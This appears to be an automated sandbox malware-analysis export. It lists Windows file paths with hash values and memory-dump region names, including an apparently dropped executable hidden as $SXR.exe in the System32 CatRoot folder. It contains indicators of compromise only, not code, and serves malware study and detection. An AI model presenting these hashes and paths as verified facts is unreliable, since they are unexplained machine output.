SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa5d4fef8290ad3008bae0709355652e
SHA1 1bd176e2ec08abd15464d3c27eeba0b2777da993
SHA256 b9572d7f5cd45f0903c757b6568c0535df34b4c8b3ff531a1a6996d3f033b865
SHA512 f327312b142a93d92a9a811208b77e761317104d1252b2c68ad966bdf87a3dd2efc1109ea5c4ca76ca793547b6300961c22ec1cfebf7f7b8f26ffdf4276f6f26

memory/4308-155-0x0000000073920000-0x00000000740D0000-memory.dmp

memory/1884-156-0x0000000003430000-0x0000000003431000-memory.dmp

memory/2796-162-0x0000016CB3820000-0x0000016CB3840000-memory.dmp

memory/2796-164-0x0000016CB35E0000-0x0000016CB3600000-memory.dmp

memory/2796-166-0x0000016CB3C80000-0x0000016CB3CA0000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 9235fd32055faf5e74677f7c2665ac9a
SHA1 cd7f88d794b3d276fbd3e20d4c5d2a7b90ceb02e
SHA256 9a1efc87bff231b312b9883678509ddefd357ae3f4f97e996ed10e6158fe034d
SHA512 995e1aaf288c8d59991366b52ab67898c2fc9b1fcc5e3c944234d56943711de356c2028b26ca291ff5dabb82b92bc46012756fb717a22a8742757b11f9f6e711

C:\Windows\System32\CatRoot\$SXR\$SXR.exe

MD5 036b625f1d42807a4a9a1b2f75ef3f6e
SHA1 9f4434a25d04c300b37ca9b4b23779525d0f83ec
SHA256 9d6b1275dc62c8a10943573ba5fdc89834c2092621e7ed457ac0a2b3f9681331
SHA512 51fcc86333e9aea8e585acc0cfb707a3b9813389289a6606b7ce6cd000ea33ddd897820b99603aa946787b8e524b36a2212307181bb38e0b0477bce81899bbc5

memory/4340-179-0x0000000073920000-0x00000000740D0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133544378039599441.txt

MD5 c09e63e4b960a163934b3c29f3bd2cc9
SHA1 d3a43b35c14ae2e353a1a15c518ab2595f6a0399
SHA256 308deca5e1ef4d875fbe0aff3ce4b0b575b28e643dffda819d4390ec77faf157
SHA512 5ca3321034dff47e3afe0b0bdfaffc08782991660910a29375a8e0363794b78247282aba65dbd882ae225aa140ae63927dfd0946a441ee6fa64a1d8c146777b9

memory/1720-185-0x0000000005570000-0x0000000005580000-memory.dmp

memory/3600-203-0x000001EDFF190000-0x000001EDFF1B0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\QDDM1QX5\microsoft.windows[1].xml

MD5 2415f1b0b1e5150e9f1e871081fd1fad
SHA1 a79e4bfddc3daf75f059fda3547bd18282d993f7
SHA256 3eff25035403aba506d0dbf69c76a22fa90ec66d2094cbf39bc5267a850902ae
SHA512 5d05da9ec1471dbf91f0c474c8db3897130543ff3c4da70724ce3a36adc38f628264c3dae4f54caef493f7593a0986a944dda0e19e947f3dfc34fc16fbd3e6bb

memory/3600-205-0x000001EDFF150000-0x000001EDFF170000-memory.dmp

memory/3600-208-0x000001EDFF760000-0x000001EDFF780000-memory.dmp

C:\Windows\System32\CatRoot\$SXR\Read.txt

MD5 79668a6729f0f219835c62c9e43b7927
SHA1 0cbbc7cc8dbd27923b18285960640f3dad96d146
SHA256 6f5747973e572dc3ec0ae4fd9eaf57263abb01c36b35fcddf96e89208b16496e
SHA512 bc3895b46db46617315ffaa2ec5e2b44b06e1d4921834be25e1b60b12f2fba900f0f496070eb9f362952abcfa0b3b359bf1ced7da5ec0db63541e0977e6ea4e3

memory/1028-218-0x00007FFEDFE80000-0x00007FFEE0021000-memory.dmp

memory/1028-227-0x0000023D88C20000-0x0000023D88C40000-memory.dmp

memory/1028-229-0x0000023D889E0000-0x0000023D88A00000-memory.dmp

memory/1028-231-0x0000023D88FF0000-0x0000023D89010000-memory.dmp

memory/4428-248-0x0000011B4E070000-0x0000011B4E090000-memory.dmp

memory/4428-252-0x0000011B4E440000-0x0000011B4E460000-memory.dmp

memory/4428-250-0x0000011B4E030000-0x0000011B4E050000-memory.dmp

memory/1132-269-0x0000025554500000-0x0000025554520000-memory.dmp

memory/1132-271-0x00000255541B0000-0x00000255541D0000-memory.dmp

memory/1132-274-0x00000255548C0000-0x00000255548E0000-memory.dmp

memory/4340-279-0x0000000073920000-0x00000000740D0000-memory.dmp

memory/4340-280-0x0000000005BC0000-0x0000000005BD0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15

MD5 0e2a09c8b94747fa78ec836b5711c0c0
SHA1 92495421ad887f27f53784c470884802797025ad
SHA256 0c1cdbbf6d974764aad46477863059eaec7b1717a7d26b025f0f8fe24338bb36
SHA512 61530a33a6109467962ba51371821ea55bb36cd2abc0e7a15f270abf62340e9166e66a1b10f4de9a306b368820802c4adb9653b9a5acd6f1e825e60128fd2409

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel

MD5 fb5f8866e1f4c9c1c7f4d377934ff4b2
SHA1 d0a329e387fb7bcba205364938417a67dbb4118a
SHA256 1649ec9493be27f76ae7304927d383f8a53dd3e41ea1678bacaff33120ea4170
SHA512 0fbe2843dfeab7373cde0643b20c073fdc2fcbefc5ae581fd1656c253dfa94e8bba4d348e95cc40d1e872456ecca894b462860aeac8b92cedb11a7cad634798c